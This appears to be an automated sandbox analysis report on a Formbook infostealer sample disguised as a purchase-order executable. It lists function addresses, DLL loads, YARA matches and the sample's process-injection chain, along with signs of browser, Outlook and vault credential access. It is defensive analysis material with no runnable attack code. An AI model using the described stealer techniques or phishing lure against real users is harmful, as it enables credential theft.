            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D20F304_2_02D20F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D42F284_2_02D42F28
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CF0CF24_2_02CF0CF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DA0CB54_2_02DA0CB5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D00C004_2_02D00C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CFADE04_2_02CFADE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D18DBF4_2_02D18DBF
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D0AD004_2_02D0AD00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D1B2C04_2_02D1B2C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DA12ED4_2_02DA12ED
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D052A04_2_02D052A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D4739A4_2_02D4739A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CED34C4_2_02CED34C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB132D4_2_02DB132D
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D070C04_2_02D070C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DAF0CC4_2_02DAF0CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB70E94_2_02DB70E9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBF0E04_2_02DBF0E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D0B1B04_2_02D0B1B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DCB16B4_2_02DCB16B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CEF1724_2_02CEF172
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D3516C4_2_02D3516C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB16CC4_2_02DB16CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBF7B04_2_02DBF7B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CF14604_2_02CF1460
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBF43F4_2_02DBF43F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D9D5B04_2_02D9D5B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB75714_2_02DB7571
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DADAC64_2_02DADAC6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D45AA04_2_02D45AA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D9DAAC4_2_02D9DAAC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFA494_2_02DBFA49
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB7A464_2_02DB7A46
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D73A6C4_2_02D73A6C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D75BF04_2_02D75BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D3DBF94_2_02D3DBF9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D1FB804_2_02D1FB80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFB764_2_02DBFB76
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D038E04_2_02D038E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D6D8004_2_02D6D800
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D099504_2_02D09950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D1B9504_2_02D1B950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D959104_2_02D95910
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D09EB04_2_02D09EB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D01F924_2_02D01F92
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFFB14_2_02DBFFB1
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFF094_2_02DBFF09
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DBFCF24_2_02DBFCF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D79C324_2_02D79C32
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D1FDC04_2_02D1FDC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB1D5A4_2_02DB1D5A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D03D404_2_02D03D40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02DB7D734_2_02DB7D73
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00131AB04_2_00131AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_001351704_2_00135170
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0013333B4_2_0013333B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_001333404_2_00133340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0014B6C04_2_0014B6C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0012CA304_2_0012CA30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0012CA274_2_0012CA27
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0012CC504_2_0012CC50
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0012ACD04_2_0012ACD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094E2D54_2_0094E2D5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094E3FB4_2_0094E3FB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094E78C4_2_0094E78C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094D7F84_2_0094D7F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B87E54 appears 111 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02D35130 appears 57 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02D7F290 appears 105 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02CEB970 appears 275 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02D47E54 appears 100 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02D6EA12 appears 86 times
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: String function: 00AB7750 appears 42 times
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: String function: 00AAF885 appears 68 times
            Source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2050173418.00000000048BD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order TE- 00011-7777.exe
            Source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000046C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order TE- 00011-7777.exe
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@13/10
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ADD712 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ACB8B0 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ACBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ADEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AD6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AEC604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00A931F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | File created: C:\Users\user\AppData\Local\Temp\aut391C.tmp
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: RMActivate_ssp.exe, 00000004.00000003.2484559029.0000000000602000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000602000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2484472585.0000000000615000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000636000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Purchase Order TE- 00011-7777.exe | ReversingLabs: Detection: 28%
            Source: Purchase Order TE- 00011-7777.exe | Virustotal: Detection: 29%
            Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe | Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Purchase Order TE- 00011-7777.exe | Static file information: File size 1227264 > 1048576
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CjeBlighAyoJst.exe, 00000003.00000000.2157848345.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318026048.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.2212437752.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212554587.0000000004101000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3887254418.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3892509880.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order TE- 00011-7777.exe, 00000000.00000003.2048768040.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138944191.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140864621.0000000003900000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2251311419.000000000094B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2248798529.000000000079A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order TE- 00011-7777.exe, 00000000.00000003.2048768040.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2138944191.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140864621.0000000003900000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000004.00000003.2251311419.000000000094B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2248798529.000000000079A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318173849.000000000273C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2593235540.000000001F5EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318173849.000000000273C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2593235540.000000001F5EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000002.00000003.2212437752.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212554587.0000000004101000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3887254418.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3892509880.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Purchase Order TE- 00011-7777.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AF20F6 LoadLibraryA,GetProcAddress, 0_2_00AF20F6
